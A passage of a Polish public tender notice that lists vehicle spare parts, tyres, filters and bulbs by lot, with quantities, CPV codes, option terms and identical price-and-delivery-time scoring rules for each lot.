USZCZELKA ZŁĄCZA PRZEW. S-359M 359-11-115	szt.	10	10<br/>57	USZCZELKA 359-12-030	szt.	10	10<br/>58	NAPINACZ 721207759	szt.	2	2<br/>59	SPRĘŻYNA GAZOWA 38888888342	szt.	4	4<br/>60	TULEJA METALOWO-GUMOWA 701683947	szt.	4	4<br/>61	TULEJA METALOWO-GUMOWA 335229260190	szt.	2	2<br/>62	PIERŚCIEN DOC. SPRZĘGŁ. 254521002000	szt.	2	2<br/>63	TARCZA SPRZĘGŁA KIA251718700	szt.	2	2<br/>64	USZCZELKA MISKI 721207385	szt.	2	2<br/>65	PRZEWÓD TURBOSPRĘŻ. HONKER 701684255	szt.	2	2<br/>66	PRZEWÓD 701683629	szt.	2	2<br/>67	PRZEWÓD SSĄCY 244254002700	szt.	2	2<br/>68	SWORZEŃ 335229260410	szt.	2	2<br/>69	KRZYŻAK 002295100	szt.	2	2<br/>70	KRZYŻAK KPL. 779057005	szt.	2	2<br/>71	KRZYŻAK KPL. 002295100	szt.	2	2<br/>72	KRZYŻAK PRZEGUBU Z ŁOZYSKIEM 2295000	szt.	2	2<br/>73	DRĄŻEK PODŁUŻNY 002999500	szt.	2	2<br/>74	TARCZA HAM. TYLNA ZE SZCZĘK.779057840	szt.	2	2<br/>75	POMPKA RĘCZNA PALIWA 350410011030	szt.	2	2<br/>76	LUSTERKO ZEWN. DUŻE LANZ-34.00	szt.	2	2<br/>77	REFLEKTOR GŁÓWNY 0223.8.000.3	szt.	2	2<br/>78	REFLEKTOR GŁÓWNY 0223.8.000.4	szt.	2	2<br/>79	LAMPA TYLNA PRAWA IVECO 504094705	szt.	2	2<br/>80	LAMPA TYLNALEWA IVECO 504094709	szt.	2	2<br/>81	LAMPA TYLNA ZESP.KPL.LEWA 76986158	szt.	2	2<br/>82	LAMPA TYLNA ZESP.KPL. PRAWA 769896157	szt.	2	2<br/>83	ZBIORNIK PALIWA PRAWY221299600	szt.	1	1<br/>84	ZBIORNIK PALIWA LEWY221299900.HONKER	szt.	1	1<br/>85	PÓŁOŚ KPL. PRAWA 779057883 HONKER	szt.	1	1 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34300000-0 - Części i akcesoria do pojazdów i silników do nich</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w opisie przedmiotu zamówienia z zastrzeżeniem, że jeżeli dla danej pozycji asortymentowej ilość minimalna i maksymalna stanowią taką samą wielkość, oznacza to, że dla tej pozycji asortymentowej Zamawiający nie stosuje prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych - 60%<br/>2) Termin realizacji dostawy dla ilości minimalnych - 40%<br/>2.	Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/><br/>P – Łączna liczba punktów uzyskanych przez daną ofertę.<br/>K1 – Liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”.<br/>K2 – Liczba punktów uzyskana przez daną ofertę w kryterium „Termin realizacji dostawy dla ilości minimalnych”.<br/>3.	W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/><br/> najniższa oferowana cena brutto oferty <br/> dla ilości minimalnych<br/> Liczba punktów = -------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty dla ilości minimalnych <br/> badanej oferty<br/><br/>W kryterium „Przyjęty do realizacji wariant dostaw” oferta uzyska:<br/>WARIANT I - 40 pkt, gdy termin dostawy będzie wynosił od 3 do 5 dni roboczych <br/>WARIANT II - 30 pkt, gdy termin dostawy będzie wynosił od 6 do 8 dni roboczych<br/>WARIANT III - 20 pkt, gdy termin dostawy będzie wynosił od 9 do 11 dni roboczych<br/>WARIANT IV - 0 pkt, gdy termin dostawy będzie wynosił 12-14 dni roboczych.<br/><br/>Wykonawca spośród przedstawionych wariantów wybiera jeden wariant dostaw i stosowną informację zaznacza w tabeli (odpowiednio do części zamówienia) w pkt 4 formularza ofertowego (załącznik nr 2 do SWZ).<br/>UWAGA:<br/>	Minimalny termin realizacji dostawy dla ilości minimalnych nie może być krótszy niż 3 dni robocze od dnia złożenia zamówienia przez Zamawiającego do dnia dostarczenia do magazynu wskazanego w opisie przedmiotu zamówienia.<br/>	Maksymalny termin realizacji dostawy dla ilości minimalnych nie może przekroczyć 14 dni roboczych od dnia złożenia zamówienia przez Zamawiającego do dnia dostarczenia do magazynu wskazanego w opisie przedmiotu zamówienia.<br/>	Za dzień roboczy Zamawiający przyjmuje dni od poniedziałku do piątku<br/>	Zaznaczenie więcej niż jednej rubryki spowoduje odrzucenie oferty<br/>	W przypadku braku zaznaczenia przez Wykonawcę w formularzu ofertowym żadnego przyjętego do realizacji wariantu dostaw, Zamawiający uzna, że Wykonawca zadeklarował WARIANT IV, w związku z tym otrzyma 0 pkt. <br/><br/>4.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>5.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>6.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy dla ilości minimalnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp. Przedmiot zamówienia	J.m	Ilość minimalna	Ilość maksymalma<br/>1	&#34;OPONA LETNIA 235/65 R16C Opona pneumatyczna radialna, drogowa, bezdętkowa, letnia. Rozmiar: 235/65 R16.<br/> Indeks nośności - 115/113 (1215/1150 kg).<br/> Indeks dopuszczalnej prędkości - R (170 km/h).<br/> Stosowana do samochodów dostawczych.&#34;	szt.	14	14<br/>2	&#34;OPONA ZIMOWA 235/65 R16C Opona pneumatyczna radialna, bezdętkowa, drogowa, zimowa. Rozmiar: 235/65 R16.<br/>Indeks nośności - 115/113 (1215/1150 kg).<br/>Indeks dopuszczalnej prędkości - R (170 km/h).<br/>Stosowana do samochodów dostawczych.&#34;	szt.	14	14<br/>3	OPONA 7.50 R16C RADIALNA, CAŁOROCZNA, TERENOWA, DĘTKOWA NA PRZÓD I TYŁ POJAZDU. STOSOWANA W SAMOCHODZIE HONKER 2000, LAND ROVER 110	szt.	4	4<br/>4	&#34;OPONA ZIMOWA 235/70R16 115/113R<br/>Opona pneumatyczna radialna, bezdętkowa, drogowa, zimowa.<br/>Rozmiar: 235/65 R16.<br/>Indeks nośności - 115/113 (1215/1150 kg).<br/>Indeks dopuszczalnej prędkości - R (170 km/h).<br/>Stosowana do samochodów dostawczych.&#34;	szt.	5	5<br/>5	&#34;OPONA LETNIA 235/70R16 115/113R<br/>Opona pneumatyczna radialna, drogowa, bezdętkowa, letnia.<br/>Rozmiar: 235/70 R16.<br/>Indeks nośności - 115/113 (1215/1150 kg).<br/>Indeks dopuszczalnej prędkości - R (170 km/h).<br/>Stosowana do samochodów dostawczych.&#34;	szt.	5	5<br/>6	OPONA ZIMOWA 245/70R16. Bezdętkowa, radialna, pneumatyczna. Indeks nośności - 107-111. Indeks dopuszczalnej prędkości H. Przeznaczona do samochodów z napędem 4x4.	szt.	4	4<br/>7	OPONA LETNIA 195/65R15. Opona pneumatyczna, radialna, bezdętkowa. Indeks nośności-95. Indeks dopuszczalnej prędkości - T-H. szt.	4	4<br/>8	OPONA ZIMOWA 195/65R15. Opona pneumatyczna, radialna, bezdętkowa. Indeks nośności-95. Indeks dopuszczalnej prędkości - T-H. szt.	4	4<br/>9	OPONA CAŁOROCZNA 175/65R14. Opona pneumatyczna, radialna, drogowa, bezdętkowa. Indeks nośności - 82. Indeks dopuszczalnej prędkości - T. Opona do przyczeki samochodowej małej ładowności.	szt.	3	3<br/>10	DĘTKA 12.00-R20 24-79-01-344	szt.	95	95<br/>11	OCHRANIACZ DĘTKI F-20(12.00-20)	szt.	72	72<br/>12	OPONA LETNIA 205/65R15C . Opona pneumatyczna, radialna, bezdętkowa. Indeks dopuszczalnej prędkości V. Indeks nośności 95-104.	szt.	4	4<br/>13	OPONA 4.00-10 CAŁOROCZNA DIAGONALNA, , DROGOWA, DĘTKOWA Indeks dopuszczalnej prędkości B. Indeks nośności 63	szt.	4	4<br/>14	Guma ryflowana 4x1200 mm o przeznaczeniu przeciwpoślizgowym. Strona licowa ryflowana, strona spodnia- odcisk tkaniny. Wzmocniona włóknami. Kolor:czarny - szerokość gumy: 1200 mm - grubość gumy: 4 mm - wytrzymałość na rozciąganie: min. 4 Mpa;	m2	13	13 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34300000-0 - Części i akcesoria do pojazdów i silników do nich</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">19510000-4 - Produkty z gumy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w opisie przedmiotu zamówienia z zastrzeżeniem, że jeżeli dla danej pozycji asortymentowej ilość minimalna i maksymalna stanowią taką samą wielkość, oznacza to, że dla tej pozycji asortymentowej Zamawiający nie stosuje prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych - 60%<br/>2) Termin realizacji dostawy dla ilości minimalnych - 40%<br/>2.	Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/><br/>P – Łączna liczba punktów uzyskanych przez daną ofertę.<br/>K1 – Liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”.<br/>K2 – Liczba punktów uzyskana przez daną ofertę w kryterium „Termin realizacji dostawy dla ilości minimalnych”.<br/>3.	W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/><br/> najniższa oferowana cena brutto oferty <br/> dla ilości minimalnych<br/> Liczba punktów = -------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty dla ilości minimalnych <br/> badanej oferty<br/><br/>W kryterium „Przyjęty do realizacji wariant dostaw” oferta uzyska:<br/>WARIANT I - 40 pkt, gdy termin dostawy będzie wynosił od 3 do 5 dni roboczych <br/>WARIANT II - 30 pkt, gdy termin dostawy będzie wynosił od 6 do 8 dni roboczych<br/>WARIANT III - 20 pkt, gdy termin dostawy będzie wynosił od 9 do 11 dni roboczych<br/>WARIANT IV - 0 pkt, gdy termin dostawy będzie wynosił 12-14 dni roboczych.<br/><br/>Wykonawca spośród przedstawionych wariantów wybiera jeden wariant dostaw i stosowną informację zaznacza w tabeli (odpowiednio do części zamówienia) w pkt 4 formularza ofertowego (załącznik nr 2 do SWZ).<br/>UWAGA:<br/>	Minimalny termin realizacji dostawy dla ilości minimalnych nie może być krótszy niż 3 dni robocze od dnia złożenia zamówienia przez Zamawiającego do dnia dostarczenia do magazynu wskazanego w opisie przedmiotu zamówienia.<br/>	Maksymalny termin realizacji dostawy dla ilości minimalnych nie może przekroczyć 14 dni roboczych od dnia złożenia zamówienia przez Zamawiającego do dnia dostarczenia do magazynu wskazanego w opisie przedmiotu zamówienia.<br/>	Za dzień roboczy Zamawiający przyjmuje dni od poniedziałku do piątku<br/>	Zaznaczenie więcej niż jednej rubryki spowoduje odrzucenie oferty<br/>	W przypadku braku zaznaczenia przez Wykonawcę w formularzu ofertowym żadnego przyjętego do realizacji wariantu dostaw, Zamawiający uzna, że Wykonawca zadeklarował WARIANT IV, w związku z tym otrzyma 0 pkt. <br/><br/>4.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>5.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>6.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy dla ilości minimalnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp. Przedmiot zamówienia	J.m	Ilość minimalna	Ilość maksymalma<br/>1	FILTR OLEJU OE-651-2	szt.	27	27<br/>2	FILTR PALIWA PE-935-1	szt.	27	27<br/>3	FILTR PALIWA FILTRON PK 937/6	szt.	57	57<br/>4	FILTR PALIWA PP 879/5	szt.	74	74<br/>5	OSUSZACZ POWIETRZA AD-785	szt.	66	66<br/>6	FILTR POWIETRZA FILTRON AM-404	szt.	27	27<br/>7	WKŁAD FILTRA POWIETRZA AM404W szt.	27	27<br/>8	FILTR KABINY PRZECIWPYŁ.FILTRON K1257-2X szt.	29	29<br/>9	WKŁAD FILTRA OLEJU WH10-65X	szt.	26	26<br/>10	FILTR OLEJU SILN.OP 592/6 429-0464	szt.	19	19<br/>11	FILTR PALIWA PP 879/4	szt.	15	15<br/>12	FILTR FILTRON AK790	szt.	22	22<br/>13	FILTR POWIETRZA P785610	szt.	15	15<br/>14	WKŁAD FILTRA UKŁADU WSPOMAGANIA OM-512	szt.	33	33<br/>15	FILTR PALIWA VW 2N0127401Q	szt.	10	10<br/>16	FILTR POWIETRZA FILTRON AP 157/10	szt.	17	17<br/>17	FILTR KABINOWY K 1311 szt.	23	23<br/>18	FILTR OLEJU OE 688/3	szt.	27	27<br/>19	FILTR KABINOWY K 1155A	szt.	11	11<br/>20	FILTR POWIETRZA AP 157/4	szt.	11	11<br/>21	FILTR PALIWA FILTRON PP-985-2	szt.	11	11<br/>22	FILTR OLEJU OP 626/6 szt.	22	22<br/>23	FILTR PALIWA PP 861/6	szt.	22	22<br/>24	FILTR OLEJU OE 682/5	szt.	2	2<br/>25	FILTR PALIWA PE-982/7	szt.	2	2<br/>26	FILTR POWIETRZA AP 152/7	szt.	2	2<br/>27	FILTR KABINY PRZECIWPYŁKOWY K-1223A	szt.	5	5<br/>28	FILTR OLEJU OP 626 szt.	46	46<br/>29	FILTR POWIETRZA AM 446/2	szt.	23	23<br/>30	FILTR PALIWA PP 837/1 szt.	24	24<br/>31	WKŁAD FILTRA PALIWA WP-40-3	szt.	123	123<br/>32	WKŁAD FILTRA OLEJU 25002/150 szt.	123	123<br/>33	WKŁAD FILTRA WSPOMAGANIA W030-20	szt.	56	56<br/>34	FILTR POWIETRZA 8015450 szt.	3	3<br/>35	FILTR PALIWA PP-861-2	szt.	3	3<br/>36	FILTR KABINOWY DCF114P 2995964	szt.	6	6<br/>37	FILTR POWIETRZA AM-455-6	szt.	1	1<br/>38	FILTR KABINOWY FILTRON K1006A	szt.	4	4<br/>39	FILTR POWIETRZA FILTRON AP 157/6 szt.	9	9<br/>40	FILTR KABINOWY K1288	szt.	9	9<br/>41	FILTR PALIWA PM 819/1	szt.	3	3<br/>42	FILTR OLEJU OP 563/1	szt.	8	8<br/>43	FILTR POWIETRZA AR 233/1	szt.	3	3<br/>44	FILTR PALIWA PP 837 szt.	25	25<br/>45	FILTR OLEJU OP 594 szt.	21	21<br/>46	FILTR POWIETRZA AR 285	szt.	20	20<br/>47	FILTR POWIETRZA AR 316/1	szt.	3	3<br/>48	FILTR OLEJU OE-682/3 FILTRON	szt.	4	4<br/>49	FILTR KABINOWY K 1261	szt.	7	7<br/>50	FILTR PALIWA PP 879/3 szt.	1	1<br/>51	FILTR PALIWA PP 879/1 szt.	3	3<br/>52	FILTR OLEJU OP 592/9 szt.	3	3<br/>53	FILTR POWIETRZA AM 414 szt.	3	3<br/>54	FILTR POWIETRZA FILTRON AP 157/5	szt.	5	5<br/>55	FILTR PALIWA FILTRON PP-985-1	szt.	5	5<br/>56	FILTR OLEJU OE 688	szt.	5	5<br/>57	FILTR OLEJU OP-570-2	szt.	5	5<br/>58	FILTR POWIETRZA AP-152/6	szt.	5	5<br/>59	FILTR KABINY FILTRON K-1343A	szt.	5	5<br/>60	FILTR OLEJU OE 688/2	szt.	5	5<br/>61	FILTR POWIETRZA AP-139/5	szt.	5	5<br/>62	FILTR OLEJU OE640/5	szt.	2	2<br/>63	FILTR PALIWA FILTRON PP-841-7	szt.	2	2<br/>64	FILTR PALIWA PUSZKOWY S-359M FP-10,5	szt.	2	2<br/>65	FILTR OLEJU OE650/2	szt.	3	3<br/>66	FILTR PALIWA PP-836/2	szt.	3	3<br/>67	FILTR KABINOWY K1111A	szt.	3	3<br/>68	FILTR POWIETRZA AP 149/7	szt.	3	3<br/>69	FILTR POWIETRZA C21431 szt.	3	3<br/>70	FILTR PALIWA PE-995	szt.	1	1<br/>71	FILTR POWIETRZA FILTRON AP 023/5	szt.	1	1<br/>72	FILTR OLEJU OE-673	szt.	1	1<br/>73	FILTR KABINOWY PRZECIWPYŁKOWY K-1377A	szt.	2	2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34300000-0 - Części i akcesoria do pojazdów i silników do nich</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w opisie przedmiotu zamówienia z zastrzeżeniem, że jeżeli dla danej pozycji asortymentowej ilość minimalna i maksymalna stanowią taką samą wielkość, oznacza to, że dla tej pozycji asortymentowej Zamawiający nie stosuje prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych - 60%<br/>2) Termin realizacji dostawy dla ilości minimalnych - 40%<br/>2.	Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/><br/>P – Łączna liczba punktów uzyskanych przez daną ofertę.<br/>K1 – Liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”.<br/>K2 – Liczba punktów uzyskana przez daną ofertę w kryterium „Termin realizacji dostawy dla ilości minimalnych”.<br/>3.	W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/><br/> najniższa oferowana cena brutto oferty <br/> dla ilości minimalnych<br/> Liczba punktów = -------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty dla ilości minimalnych <br/> badanej oferty<br/><br/>W kryterium „Przyjęty do realizacji wariant dostaw” oferta uzyska:<br/>WARIANT I - 40 pkt, gdy termin dostawy będzie wynosił od 3 do 5 dni roboczych <br/>WARIANT II - 30 pkt, gdy termin dostawy będzie wynosił od 6 do 8 dni roboczych<br/>WARIANT III - 20 pkt, gdy termin dostawy będzie wynosił od 9 do 11 dni roboczych<br/>WARIANT IV - 0 pkt, gdy termin dostawy będzie wynosił 12-14 dni roboczych.<br/><br/>Wykonawca spośród przedstawionych wariantów wybiera jeden wariant dostaw i stosowną informację zaznacza w tabeli (odpowiednio do części zamówienia) w pkt 4 formularza ofertowego (załącznik nr 2 do SWZ).<br/>UWAGA:<br/>	Minimalny termin realizacji dostawy dla ilości minimalnych nie może być krótszy niż 3 dni robocze od dnia złożenia zamówienia przez Zamawiającego do dnia dostarczenia do magazynu wskazanego w opisie przedmiotu zamówienia.<br/>	Maksymalny termin realizacji dostawy dla ilości minimalnych nie może przekroczyć 14 dni roboczych od dnia złożenia zamówienia przez Zamawiającego do dnia dostarczenia do magazynu wskazanego w opisie przedmiotu zamówienia.<br/>	Za dzień roboczy Zamawiający przyjmuje dni od poniedziałku do piątku<br/>	Zaznaczenie więcej niż jednej rubryki spowoduje odrzucenie oferty<br/>	W przypadku braku zaznaczenia przez Wykonawcę w formularzu ofertowym żadnego przyjętego do realizacji wariantu dostaw, Zamawiający uzna, że Wykonawca zadeklarował WARIANT IV, w związku z tym otrzyma 0 pkt. <br/><br/>4.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>5.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>6.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy dla ilości minimalnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp. Przedmiot zamówienia	Jm	Ilość minimalna	Ilość maksymalma<br/>1	ROLKA NAPINACZA 03G145276	szt.	6	6<br/>2	PASEK WIELOROWKOWY 6PK1555	szt.	10	10<br/>3	KLOCKI HAMULCOWE TYLNE 7E0698451	kpl.	8	8<br/>4	TARCZA HAMULCOWA TYŁ 7H0615601B	szt.	8	8<br/>5	ZESTAW SPRZĘGŁA LUK 624 4011 33	kpl.	2	2<br/>6	USZCZELNIACZ PÓŁOSI LEWEJ 02M301189G	szt.	6	6<br/>7	KLOCKI HAMULCOWE ATE 13-0460-7236-2	kpl.	8	8<br/>8	KLOCKI HAMULCOWE TYŁ 0986494583	kpl.	8	8<br/>9	TARCZA HAMULCOWA PRZEDNIA 7E0615301C	szt.	8	8<br/>10	TARCZA HAMULCOWA TYLNA 0986479097	szt.	8	8<br/>11	ŁOŻYSKO AMORTYZATORA PRZÓD 7E0 412 249	szt.	6	6<br/>12	KLOCKI HAMULCOWE VW PRZÓD 2N0698151	kpl.	6	6<br/>13	CZUJNIK KLOCKÓW HAMULCOWYCH 2N0615437	szt.	14	14<br/>14	CZUJNIK KLOCKÓW HAMULCOWYCH 2N0615437A	szt.	14	14<br/>15	OSŁONA PRZEGUBU ZEWN.FEBI FE172965	szt.	8	8<br/>16	TARCZA HAMULCOWA PRZEDNIA 2N0615301A	szt.	6	6<br/>17	WKŁADKA GUMOWA 7H5 411 313 B	szt.	6	6<br/>18	POKROWCE NA SIEDZENIA FORD RANGER - zestaw na wszystkie siedzenia	kpl.	7	7<br/>19	KLOCKI HAMULCOWE 2H6698451A	kpl.	6	6<br/>20	KOREK SPUSTOWY MISKI OLEJU TOPRAN 109035	szt.	45	45<br/>21	ZESTAW PIÓR CRAFTER 700/650 7C1998-002	szt.	16	16<br/>22	PIÓRO WYCIERACZKI 3397009821	szt.	31	31<br/>23	ŻARÓWKA SAMOCHODOWA H11-LL-12V-55W	szt.	20	20<br/>24	ŁOŻYSKO SPRZĘGŁA LUK 510022510	szt.	1	1<br/>25	ŁOŻYSKO KOŁA FAG 713678100	szt.	1	1<br/>26	ŁOŻYSKO 0089815905	szt.	1	1<br/>27	PIÓRO WYCIERACZKI DŁ.475MM	szt.	20	20<br/>28	AMORTYZATOR TYŁ OEM 46437781	szt.	2	2<br/>29	TULEJA WAHACZA TYLNEGO LEWA 7747956	szt.	6	6<br/>30	PASEK KLINOWY WIELOROWKOWY GATES 5PK1750	szt.	10	10<br/>31	PIÓRA WYCIERACZEK OXIMO WUS550	szt.	10	10<br/>32	AMORTYZATOR KYB 335827	szt.	2	2<br/>33	ZESTAW OCHRONNY AMORTYZATORA KYB 910159	kpl.	6	6<br/>34	ROLKA NAPINACZ 04L145299M	szt.	4	4<br/>35	PASEK WIELOROWKOWY 6PK1090	szt.	14	14<br/>36	BEZPIECZNIK SAMOCHODOWY PŁYTKOWY 5A.	szt.	240	240<br/>37	PIÓRO WYCIERACZKI TYŁ 2E0-955-421	szt.	20	20<br/>38	ZESTAW NAPRAWCZY ZACISKU HAMULCA D42317C	kpl.	4	4<br/>39	KLOCKI HAMULCOWE FVR-1780	kpl.	2	2<br/>40	BEZPIECZNIK SAMOCHODOWY PŁYTKOWY 25A.	szt.	240	240<br/>41	BEZPIECZNIK SAMOCHODOWY PŁYTKOWY 30A.	szt.	240	240<br/>42	ŻARÓWKA SM-26 BA15S 26V 15W	szt.	200	200<br/>43	ŻARÓWKA SAMOCHODOWA H4-24V-75/70W	szt.	150	150<br/>44	ŻARÓWKA SAMOCHODOWA BA9S-24V-3W	szt.	250	250<br/>45	ŻARÓWKA SAMOCHODOWA BA20D-12V-35/35W	szt.	210	210<br/>46	ŻARÓWKA SAMOCHODOWA BA15S-24V-10W	szt.	250	250<br/>47	ŻARÓWKA SAMOCHODOWA BA15S 28V 5W	szt.	200	200<br/>48	ŻARÓWKA SAMOCHODOWA BA15S 28V 10W	szt.	150	150<br/>49	ŻARÓWKA SAMOCHODOWA H7 12V 55W	szt.	210	210<br/>50	ŻARÓWKA SAMOCHODOWA BA15S-24V-5W	szt.	170	170<br/>51	ŻARÓWKA SAMOCHODOWA R10W BA15S 24V 10W	szt.	170	170<br/>52	ŻARÓWKA SAMOCHODOWA P45T 12V 45/40W	szt.	170	170<br/>53	ŻARÓWKA SAMOCHODOWA H3-12V-55W	szt.	180	180<br/>54	ŻARÓWKA SAMOCHODOWA H4-12V-60/55W	szt.	170	170<br/>55	ŻARÓWKA KSENONOWA D1S 12V 35W	szt.	35	35<br/>56	ŻARÓWKA SAMOCHODOWA 